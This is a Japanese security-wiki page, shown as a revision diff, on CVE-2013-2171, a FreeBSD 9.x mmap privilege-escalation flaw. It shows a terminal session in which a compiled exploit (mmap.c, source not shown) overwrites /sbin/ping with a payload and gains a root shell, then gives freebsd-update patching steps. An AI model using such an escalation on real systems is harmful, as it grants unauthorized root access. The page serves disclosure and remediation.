「CVE-2013-2171 FreeBSD mmapによる権限昇格の脆弱性」の版間の差分

提供: セキュリティ
移動: 案内検索
(ページの作成:「<!-- vim: filetype=mediawiki --> CVE-2013-2171 は、 FreeBSDmmap を利用した権限昇格脆弱性です。 __TOC__ == 概要 == CVE-20...」)
 
行23: 行23:
 
Mon Apr 29 18:11:52 UTC 2013
 
Mon Apr 29 18:11:52 UTC 2013
 
root@amd64-builder.daemonology.net:/usr/obj/usr/src/sys/GENERIC  i386
 
root@amd64-builder.daemonology.net:/usr/obj/usr/src/sys/GENERIC  i386
vm% gcc mmap.c
 
 
vm% id
 
vm% id
 
uid=1008(guest) gid=1001(users) groups=1001(users)
 
uid=1008(guest) gid=1001(users) groups=1001(users)

2013年7月5日 (金) 00:36時点における版


CVE-2013-2171 は、 FreeBSDmmap を利用した権限昇格脆弱性です。


概要

CVE-2013-2171 は、 FreeBSDmmap を利用した権限昇格脆弱性です。

FreeBSD 9.0+ 以上に影響があります。 FreeBSD 9.0R, FreeBSD 9.1R で試しました。

使い方

権限昇格の例は、以下の通りです。

vm% uname -a
FreeBSD vm2.local 9.1-RELEASE-p3 FreeBSD 9.1-RELEASE-p3 #0:
Mon Apr 29 18:11:52 UTC 2013
root@amd64-builder.daemonology.net:/usr/obj/usr/src/sys/GENERIC  i386
vm% id
uid=1008(guest) gid=1001(users) groups=1001(users)
vm% gcc mmap.c
vm% ./a.out
[+] Saved old '/sbin/ping'
[+] Using mmap-ed area at 0x281a4000
[+] Attached to 58383
[+] Copied 4917 bytes of payload to '/sbin/ping'
[+] Triggering payload
# id
uid=0(root) gid=0(wheel) egid=1001(users) groups=1001(users)

対処方法

freebsd-update で更新します。

% sudo freebsd-update fetch
% sudo freebsd-update install

関連項目